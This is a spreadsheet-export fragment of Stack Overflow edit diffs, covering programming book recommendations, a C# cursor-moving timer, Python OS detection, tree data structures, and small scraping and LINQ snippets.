  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Best Software Writing I&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Joel Spolsky&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;The Practice of Programming&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Kernighan and Pike&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Pragmatic Thinking and Learning: Refactor Your Wetware&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Andy Hunt&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Software Estimation: Demystifying the Black Art&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Steve McConnel&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;The Passionate Programmer (My Job Went To India)&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Chad Fowler&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Hackers: Heroes of the Computer Revolution&lt;/span&gt;&lt;/em&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Algorithms + Data Structures = Programs&lt;/span&gt;&lt;/em&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Writing Solid Code&lt;/span&gt;&lt;/em&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;JavaScript - The Good Parts&lt;/span&gt;&lt;/em&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Getting Real&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by 37 Signals&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Foundations of Programming&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Karl Seguin&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Computer Graphics: Principles and Practice in C&lt;/span&gt;&lt;/em&gt; &lt;span class="diff-delete"&gt;(2nd Edition)&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Thinking in Java&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Bruce Eckel&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;The Elements of Computing Systems&lt;/span&gt;&lt;/em&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Refactoring to Patterns&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Joshua Kerievsky&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Modern Operating Systems&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Andrew S. Tanenbaum&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;The Annotated Turing&lt;/span&gt;&lt;/em&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Things That Make Us Smart&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Donald Norman&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;The Timeless Way of Building&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Christopher Alexander&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;The Deadline: A Novel About Project Management&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Tom DeMarco&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;The C++ Programming Language (3rd edition)&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Stroustrup&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Patterns of Enterprise Application Architecture&lt;/span&gt;&lt;/em&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Computer Systems - A Programmer's Perspective&lt;/span&gt;&lt;/em&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Agile Principles, Patterns, and Practices in C#&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Robert C. Martin&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Growing Object-Oriented Software, Guided&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Tests&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Framework Design Guidelines&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Brad Abrams&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Object Thinking&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Dr. David West&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Advanced Programming in the UNIX Environment&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by W. Richard Stevens&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Hackers and Painters: Big Ideas from the Computer Age&lt;/span&gt;&lt;/em&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;The Soul of a New Machine&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Tracy Kidder&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;CLR via C#&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Jeffrey Richter&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;The Timeless Way of Building&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Christopher Alexander&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Design Patterns in C#&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Steve Metsker&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Alice in Wonderland&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Lewis Carol&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Zen and the Art of Motorcycle Maintenance&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Robert M. Pirsig&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;About Face - The Essentials of Interaction Design&lt;/span&gt;&lt;/em&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Here Comes Everybody: The Power of Organizing Without Organizations&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Clay Shirky&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;The Tao of Programming&lt;/span&gt;&lt;/em&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Computational Beauty of Nature&lt;/span&gt;&lt;/em&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Writing Solid Code&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Steve Maguire&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Philip and Alex's Guide to Web Publishing&lt;/span&gt;&lt;/em&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Object-Oriented Analysis and Design with Applications&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Grady Booch&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Effective Java&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Joshua Bloch&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Computability&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by N. J. Cutland&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Masterminds of Programming&lt;/span&gt;&lt;/em&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;The Tao Te Ching&lt;/span&gt;&lt;/em&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;The Productive Programmer&lt;/span&gt;&lt;/em&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;The Art of Deception&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Kevin Mitnick&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;The Career Programmer: Guerilla Tactics for an Imperfect World&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Christopher Duncan&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Paradigms of Artificial Intelligence Programming: Case studies in Common Lisp&lt;/span&gt;&lt;/em&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Masters of Doom&lt;/span&gt;&lt;/em&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Pragmatic Unit Testing in C# with NUnit&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Andy Hunt and Dave Thomas with Matt Hargett&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;How To Solve It&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by George Polya&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;The Alchemist&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Paulo Coelho&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Smalltalk-80: The Language and its Implementation&lt;/span&gt;&lt;/em&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Writing Secure Code&lt;/span&gt;&lt;/em&gt; (&lt;span class="diff-delete"&gt;2nd Edition) by Michael Howard&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Introduction&lt;/span&gt; to &lt;span class="diff-delete"&gt;Functional Programming&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Philip Wadler and Richard Bird&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;No Bugs!&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by David Thielen&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Rework&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Jason Freid and DHH&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;JUnit in Action&lt;/span&gt;&lt;/em&gt;&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;a href="http://cc2e.com/" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;Code Complete (2nd Ed) by Steve McConnell&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;a href="http://www.coverbrowser.com/image/design-books/728-4.jpg" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;cover http://www.coverbrowser.com/image/design-books/728-4.jpg&lt;/span&gt;&lt;/a&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;span class="diff-add"&gt; "The encyclopedia&lt;/span&gt; of &lt;span class="diff-add"&gt;good programming practice&lt;/span&gt;, &lt;span class="diff-add"&gt;Code Complete focuses on individual craftsmanship -- all the things that add up to what we instinctively call "writing clean code&lt;/span&gt;.&lt;span class="diff-add"&gt;" This is the kind of book that has 50 pages just talking about code layout&lt;/span&gt; and &lt;span class="diff-add"&gt;whitespace&lt;/span&gt;.&lt;span class="diff-add"&gt;"&lt;/span&gt; &lt;span class="diff-add"&gt;--&lt;/span&gt;&lt;a href="http://www.joelonsoftware.com/navLinks/fog0000000262.html" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;Joel&lt;/span&gt;&lt;/a&gt; (&lt;em&gt;&lt;span class="diff-add"&gt;NB imo there's more&lt;/span&gt; to &lt;span class="diff-add"&gt;it than semantics&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-add"&gt;)&lt;/span&gt;&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Ryan Lundy</t>
  </si>
  <si>
    <t>random</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Something like this should work (&lt;span class="diff-delete"&gt;though&lt;/span&gt;, you &lt;strong&gt;will&lt;/strong&gt; want to change the interval)&lt;span class="diff-delete"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;public Form1()_x000D_
{_x000D_
  InitializeComponent();_x000D_
  Timer Every4Minutes = new Timer();_x000D_
  Every4Minutes.Interval = 10;_x000D_
  Every4Minutes.Tick += new EventHandler(MoveNow);_x000D_
  Every4Minutes.Start();_x000D_
}_x000D_
_x000D_
void MoveNow(object sender, EventArgs e)_x000D_
{_x000D_
  Cursor.Position = new Point(Cursor.Position.X - 1, Cursor.Position.Y - 1);_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Something like this should work&lt;span class="diff-add"&gt;.&lt;/span&gt; (&lt;span class="diff-add"&gt; though&lt;/span&gt;, you &lt;strong&gt;will&lt;/strong&gt; want to change the interval&lt;span class="diff-add"&gt;&amp;nbsp; &lt;/span&gt;)&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;public Form1()_x000D_
{_x000D_
&lt;span class="diff-add"&gt;  &lt;/span&gt;  InitializeComponent();_x000D_
&lt;span class="diff-add"&gt;  &lt;/span&gt;  Timer Every4Minutes = new Timer();_x000D_
&lt;span class="diff-add"&gt;  &lt;/span&gt;  Every4Minutes.Interval = 10;_x000D_
&lt;span class="diff-add"&gt;  &lt;/span&gt;  Every4Minutes.Tick += new EventHandler(MoveNow);_x000D_
&lt;span class="diff-add"&gt;  &lt;/span&gt;  Every4Minutes.Start();_x000D_
}_x000D_
_x000D_
void MoveNow(object sender, EventArgs e)_x000D_
{_x000D_
&lt;span class="diff-add"&gt;  &lt;/span&gt;  Cursor.Position = new Point(Cursor.Position.X - 1, Cursor.Position.Y - 1);_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Alex Essilfie</t>
  </si>
  <si>
    <t>Konrad Viltersten</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;How can I determine what OS&lt;/span&gt; I&lt;span class="diff-delete"&gt; am running on in Python?&lt;/span&gt;&lt;br&gt;&lt;span class="diff-delete"&gt; What does my program&lt;/span&gt; need to look at to see if &lt;span class="diff-delete"&gt;it is running&lt;/span&gt; on Windows, Unix, etc?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;What do&lt;/span&gt; I need to look at to see if &lt;span class="diff-add"&gt;I'm&lt;/span&gt; on Windows, Unix, etc?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Mark Harrison</t>
  </si>
  <si>
    <t>GEOCHET</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; For the record &lt;span class="diff-delete"&gt;here are&lt;/span&gt; the results on Mac:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;gt;&amp;gt;&amp;gt; import os_x000D_
&amp;gt;&amp;gt;&amp;gt; os.name_x000D_
'posix'_x000D_
&amp;gt;&amp;gt;&amp;gt; import platform_x000D_
&amp;gt;&amp;gt;&amp;gt; platform.system()_x000D_
'Darwin'_x000D_
&amp;gt;&amp;gt;&amp;gt; platform.release()_x000D_
'8.11.1'_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; For the record &lt;span class="diff-add"&gt;here's&lt;/span&gt; the results on Mac:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;gt;&amp;gt;&amp;gt; import os_x000D_
&amp;gt;&amp;gt;&amp;gt; os.name_x000D_
'posix'_x000D_
&amp;gt;&amp;gt;&amp;gt; import platform_x000D_
&amp;gt;&amp;gt;&amp;gt; platform.system()_x000D_
'Darwin'_x000D_
&amp;gt;&amp;gt;&amp;gt; platform.release()_x000D_
'8.11.1'_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>SuperBiasedMan</t>
  </si>
  <si>
    <t>Chris</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;a href="http://en.wikipedia.org/wiki/Red-black_tree" rel="nofollow noreferrer"&gt;Red-black&lt;/a&gt; is better than &lt;code&gt;&lt;span class="diff-delete"&gt;AVL&lt;/span&gt;&lt;/code&gt; for insertion-heavy applications. If you foresee relatively uniform look-up, then Red-black is the way to go. If you foresee a relatively unbalanced look-up where more recently viewed elements are more likely to be viewed again, you want to use &lt;a href="http://en.wikipedia.org/wiki/Splay_tree" rel="nofollow noreferrer"&gt;splay trees&lt;/a&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;a href="http://en.wikipedia.org/wiki/Red-black_tree" rel="nofollow noreferrer"&gt;Red-black&lt;/a&gt; is better than &lt;span class="diff-add"&gt;AVL&lt;/span&gt; for insertion-heavy applications. If you foresee relatively uniform look-up, then Red-black is the way to go. If you foresee a relatively unbalanced look-up where more recently viewed elements are more likely to be viewed again, you want to use &lt;a href="http://en.wikipedia.org/wiki/Splay_tree" rel="nofollow noreferrer"&gt;splay trees&lt;/a&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I would like to make a nightly cron job that fetches my &lt;span class="diff-delete"&gt;StackOverflow&lt;/span&gt; page and &lt;span class="diff-delete"&gt;differentiates&lt;/span&gt; it from the previous day's page, so I can see a change summary of my questions, answers, ranking, etc&lt;span class="diff-delete"&gt;..&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; Unfortunately, I couldn't get the right set of cookies to make this work&lt;span class="diff-delete"&gt;, does anyone have any&lt;/span&gt; ideas?&lt;/p&gt; _x000D_
 &lt;p&gt; Also, when the beta is finished will my status page be accessible without logging in?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I would like to make a nightly cron job that fetches my &lt;span class="diff-add"&gt;stackoverflow&lt;/span&gt; page and &lt;span class="diff-add"&gt;diffs&lt;/span&gt; it from the previous day's page, so I can see a change summary of my questions, answers, ranking, etc.&lt;/p&gt; _x000D_
 &lt;p&gt; Unfortunately, I couldn't get the right set of cookies&lt;span class="diff-add"&gt;, etc,&lt;/span&gt; to make this work&lt;span class="diff-add"&gt;. Any&lt;/span&gt; ideas?&lt;/p&gt; _x000D_
 &lt;p&gt; Also, when the beta is finished&lt;span class="diff-add"&gt;,&lt;/span&gt; will my status page be accessible without logging in?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>mattytommo</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I use hpricot on ruby. As an example this is a snippet of code that I use to retrieve all book titles from the 6 pages of my HireThings account (as they don't seem to provide a single page with this info)&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;pagerange = 1..6_x000D_
proxy = Net::HTTP::Proxy(proxy, port, user, pwd)_x000D_
proxy.start('www.hirethings.co.nz') do |http|_x000D_
  pagerange.each do |page|_x000D_
    resp, data = http.get "/perth_dotnet?page=#{page}"_x000D_
    if resp.class == Net::HTTPOK_x000D_
      (Hpricot(data)/"h3 a").each { |a| puts a.innerText }_x000D_
    end_x000D_
  end_x000D_
end_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; It's pretty much complete. All that comes before this are library imports and the settings for my proxy.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I use hpricot on ruby. As an example this is a snippet of code that I use to retrieve all book titles from the 6 pages of my HireThings account (as they don't seem to provide a single page with this info)&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;pagerange = 1..6_x000D_
proxy = Net::HTTP::Proxy(proxy, port, user, pwd)_x000D_
proxy.start('www.hirethings.co.nz') do |http|_x000D_
  pagerange.each do |page|_x000D_
    resp, data = http.get "/perth_dotnet?page=#{page}"&lt;span class="diff-add"&gt; &lt;/span&gt;_x000D_
    if resp.class == Net::HTTPOK_x000D_
      (Hpricot(data)/"h3 a").each { |a| puts a.innerText }_x000D_
    end_x000D_
  end_x000D_
end&lt;span class="diff-add"&gt; &lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; It's pretty much complete. All that comes before this are library imports and the settings for my proxy.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Andrew Grimm</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;Try&lt;/span&gt; the following&lt;span class="diff-delete"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;var names = (from dr in dataTable.Rows_x000D_
             select (string)dr["Name"]).Distinct().OrderBy(name =&amp;gt; name);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;This&lt;/span&gt; should work for what you need&lt;span class="diff-delete"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;try&lt;/span&gt; the following&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;var names = (from dr in dataTable.Rows_x000D_
             select (string)dr["Name"]).Distinct().OrderBy(name =&amp;gt; name);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;this&lt;/span&gt; should work for what you need&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Nick Berardi</t>
  </si>
  <si>
    <t>Peter Mortensen</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
